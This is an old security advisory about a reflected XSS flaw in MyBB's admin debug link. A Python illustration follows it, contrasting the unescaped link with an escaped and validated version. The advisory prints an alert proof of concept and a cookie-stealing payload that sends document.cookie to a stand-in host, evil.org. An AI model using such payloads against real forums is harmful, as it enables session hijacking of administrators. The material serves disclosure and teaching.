mybbXSS.txt

๐Ÿ—“๏ธย 07 Sep 2005ย 00:00:00Reported byย robokoderTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 35ย Views

XSS vulnerability in all MyBB versions including PR2. Debug link on admin pages allows injection of malicious scripts


Code

```text
XSS VULN IN ALL MYBB VERSIONS (INCLUDING PR2)
Vendor: given SEVEN days notice, no patch released!
Just to say, I am appalled with the fact that I contacted MyBB on the 30
August, and was originally not planning to go public.
However, because they have failed to release a patch I have decided to
alert the wider community.

At the bottom of every page shown to the admins is a debug link.
Unfortunately, this fails to properly sanitize user input, so, for
example, you could try:
'forumdisplay.php?fid=2&datecut=""><script>alert(document.cookie)</script>'

Although only admins can exploit this vuln, someone could send them a
link such as
[http://www.forum.com/forumdisplay.php?fid=2&datecut=""><script>window.location="http://evil.org/steal.php?cookie="+document.cookie</script>]
and ouch!

robokoder
fusionnx.com - The Web Developer's Resource Centre
```
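The flaw the advisory describes is a reflected XSS: a request parameter (`datecut`) is copied unescaped into the `href` attribute of the admin debug link, so a value containing `"><script>` closes the attribute and opens a new tag. The following is an added illustration, not MyBB's own code and not the reporter's: it reconstructs the flawed pattern in a hypothetical `debug_link_unsafe`, places the hardened form (`debug_link_safe`, which URL-encodes the query and HTML-escapes the attribute) beside it, and adds an input-validation step (`validate_int_param`) on the assumption that `datecut` is meant to carry a number. It is written in Python as a stand-alone demonstration rather than in the forum's PHP; the parameter values are constructed from the payload quoted above.

```python
import html
from urllib.parse import urlencode

# Constructed sample: the query parameters carried by the link quoted in the
# advisory (fid is a forum id, datecut carries the markup-breakout payload).
SAMPLE_PARAMS = {
    "fid": "2",
    "datecut": '""><script>alert(document.cookie)</script>',
}


def debug_link_unsafe(script: str, params: dict) -> str:
    """Hypothetical reconstruction of the flawed pattern: raw request values
    are concatenated straight into the href attribute of the debug link."""
    query = "&".join(f"{k}={v}" for k, v in params.items())
    return f'<a href="{script}?{query}&debug=1">Debug</a>'


def debug_link_safe(script: str, params: dict) -> str:
    """Hardened form: URL-encode every query value, then HTML-escape the whole
    attribute value. quote=True makes html.escape encode the double quote, so
    a value can no longer terminate the href attribute."""
    query = urlencode(dict(params, debug="1"))
    href = html.escape(f"{script}?{query}", quote=True)
    return f'<a href="{href}">Debug</a>'


def validate_int_param(value: str):
    """Defence in depth: a parameter that should be numeric is parsed as an
    int before use; anything else is rejected (returns None). This assumes
    datecut is meant to be a number, which the advisory does not state."""
    if value.isdigit():
        return int(value)
    return None


def contains_markup_breakout(rendered: str) -> bool:
    """Crude check used here to compare the two renderings: does the output
    contain a script tag that the template never intended to emit?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print(debug_link_unsafe("forumdisplay.php", SAMPLE_PARAMS))
    print(debug_link_safe("forumdisplay.php", SAMPLE_PARAMS))
    print(validate_int_param(SAMPLE_PARAMS["datecut"]))
```

The escaped link still reaches the browser as a normal URL (the browser decodes `&amp;` and the percent-encoding when following it), so the debug feature keeps working; only the ability of a value to leave the attribute context is removed. Validation alone would also have blocked this particular payload, but output encoding is the fix that holds for every parameter, numeric or not.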
